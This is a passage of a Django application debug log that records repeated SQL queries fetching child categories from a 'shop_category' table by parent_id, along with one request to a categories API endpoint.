FROM "shop_category" WHERE "shop_category"."parent_id" = 22 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(22,) DEBUG 2019-12-20 07:23:09,983 utils 4252 140031503103744 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 23 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(23,) DEBUG 2019-12-20 07:23:09,986 utils 4252 140031503103744 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 24 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(24,) DEBUG 2019-12-20 07:23:09,988 utils 4252 140031503103744 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 25 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(25,) DEBUG 2019-12-20 07:23:09,990 utils 4252 140031503103744 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 7 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(7,) DEBUG 2019-12-20 07:23:09,994 utils 4252 140031503103744 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 37 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(37,) DEBUG 2019-12-20 07:23:09,996 utils 4252 140031503103744 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 39 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(39,) DEBUG 2019-12-20 07:23:09,998 utils 4252 140031503103744 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 38 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(38,) DEBUG 2019-12-20 07:23:10,001 utils 4252 140031503103744 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 36 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(36,) DEBUG 2019-12-20 07:23:10,004 utils 4252 140031503103744 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 35 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(35,) DEBUG 2019-12-20 07:23:10,006 utils 4252 140031503103744 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 4 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(4,) DEBUG 2019-12-20 07:23:10,010 utils 4252 140031503103744 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 26 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(26,) DEBUG 2019-12-20 07:23:10,012 utils 4252 140031503103744 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 29 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(29,) DEBUG 2019-12-20 07:23:10,014 utils 4252 140031503103744 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 28 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(28,) DEBUG 2019-12-20 07:23:10,017 utils 4252 140031503103744 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 27 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(27,) DEBUG 2019-12-20 07:23:10,019 utils 4252 140031503103744 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 8 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(8,) DEBUG 2019-12-20 07:23:10,022 utils 4252 140031503103744 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 43 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(43,) DEBUG 2019-12-20 07:23:10,024 utils 4252 140031503103744 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 42 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(42,) DEBUG 2019-12-20 07:23:10,026 utils 4252 140031503103744 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 41 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(41,) DEBUG 2019-12-20 07:23:10,029 utils 4252 140031503103744 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 40 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(40,) DEBUG 2019-12-20 07:23:10,031 utils 4252 140031503103744 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 5 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(5,) DEBUG 2019-12-20 07:23:10,036 utils 4252 140031503103744 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 34 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(34,) DEBUG 2019-12-20 07:23:10,039 utils 4252 140031503103744 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 33 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(33,) DEBUG 2019-12-20 07:23:10,042 utils 4252 140031503103744 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 32 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(32,) DEBUG 2019-12-20 07:23:10,045 utils 4252 140031503103744 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 31 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(31,) DEBUG 2019-12-20 07:23:10,048 utils 4252 140031503103744 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 30 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(30,) DEBUG 2019-12-20 07:23:10,050 utils 4252 140031503103744 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 11 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(11,) DEBUG 2019-12-20 07:23:10,054 utils 4252 140031503103744 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 17 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(17,) DEBUG 2019-12-20 07:23:10,057 utils 4252 140031503103744 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 16 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(16,) DEBUG 2019-12-20 07:23:10,060 utils 4252 140031503103744 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 9 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(9,) DEBUG 2019-12-20 07:23:10,064 utils 4252 140031503103744 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 44 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(44,) DEBUG 2019-12-20 07:23:10,067 utils 4252 140031503103744 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 45 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(45,) [20/Dec/2019 07:23:10] "GET /api/v1/categories/ HTTP/1.0" 200 15396 DEBUG 2019-12-20 07:23:10,782 utils 4252 140031503103744 (0.004) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=() DEBUG 2019-12-20 07:23:10,793 utils 4252 140031503103744 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 10 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(10,) DEBUG 2019-12-20 07:23:10,799 utils 4252 140031503103744 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 46 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(46,) DEBUG 2019-12-20 07:23:10,803 utils 4252 140031503103744 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 6 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(6,) DEBUG 2019-12-20 07:23:10,810 utils 4252 140031503103744 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 14 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(14,) DEBUG 2019-12-20 07:23:10,814 utils 4252 140031503103744 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 13 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(13,) DEBUG 2019-12-20 07:23:10,819 utils 4252 140031503103744 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 12 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(12,) DEBUG 2019-12-20 07:23:10,824 utils 4252 140031503103744 (0.002) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 15 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(15,) DEBUG 2019-12-20 07:23:10,829 utils 4252 140031503103744 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 1 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(1,) DEBUG 2019-12-20 07:23:10,836 utils 4252 140031503103744 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 20 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(20,) DEBUG 2019-12-20 07:23:10,842 utils 4252 140031503103744 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 18 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(18,) DEBUG 2019-12-20 07:23:10,846 utils 4252 140031503103744 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 21 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(21,) DEBUG 2019-12-20 07:23:10,851 utils 4252 140031503103744 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 19 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(19,) DEBUG 2019-12-20 07:23:10,855 utils 4252 140031503103744 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 3 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(3,) DEBUG 2019-12-20 07:23:10,863 utils 4252 140031503103744 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 22 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(22,) DEBUG 2019-12-20 07:23:10,868 utils 4252 140031503103744 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 23 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(23,) DEBUG 2019-12-20 07:23:10,873 utils 4252 140031503103744 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 24 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(24,) DEBUG 2019-12-20 07:23:10,877 utils 4252 140031503103744 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 25 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(25,) DEBUG 2019-12-20 07:23:10,881 utils 4252 140031503103744 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 7 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(7,) DEBUG 2019-12-20 07:23:10,890 utils 4252 140031503103744 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 37 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(37,) DEBUG 2019-12-20 07:23:10,895 utils 4252 140031503103744 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 39 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(39,) DEBUG 2019-12-20 07:23:10,899 utils 4252 140031503103744 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 38 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(38,) DEBUG 2019-12-20 07:23:10,903 utils 4252 140031503103744 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 36 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(36,) DEBUG 2019-12-20 07:23:10,907 utils 4252 140031503103744 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 35 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(35,) DEBUG 2019-12-20 07:23:10,911 utils 4252 140031503103744 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 4 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(4,) DEBUG 2019-12-20 07:23:10,919 utils 4252 140031503103744 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 26 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(26,) DEBUG 2019-12-20 07:23:10,924 utils 4252 140031503103744 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 29 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(29,) DEBUG 2019-12-20 07:23:10,928 utils 4252 140031503103744 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 28 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(28,) DEBUG 2019-12-20 07:23:10,932 utils 4252 140031503103744 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 27 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(27,) DEBUG 2019-12-20 07:23:10,936 utils 4252 140031503103744 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 8 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(8,) DEBUG 2019-12-20 07:23:10,943 utils 4252 140031503103744 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 43 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(43,) DEBUG 2019-12-20 07:23:10,948 utils 4252 140031503103744 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 42 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(42,) DEBUG 2019-12-20 07:23:10,953 utils 4252 140031503103744 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 41 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(41,) DEBUG 2019-12-20 07:23:10,958 utils 4252 140031503103744 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 40 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(40,) DEBUG 2019-12-20 07:23:10,962 utils 4252 140031503103744 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 5 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(5,) DEBUG 2019-12-20 07:23:10,969 utils 4252 140031503103744 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 34 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(34,) DEBUG 2019-12-20 07:23:10,973 utils 4252 140031503103744 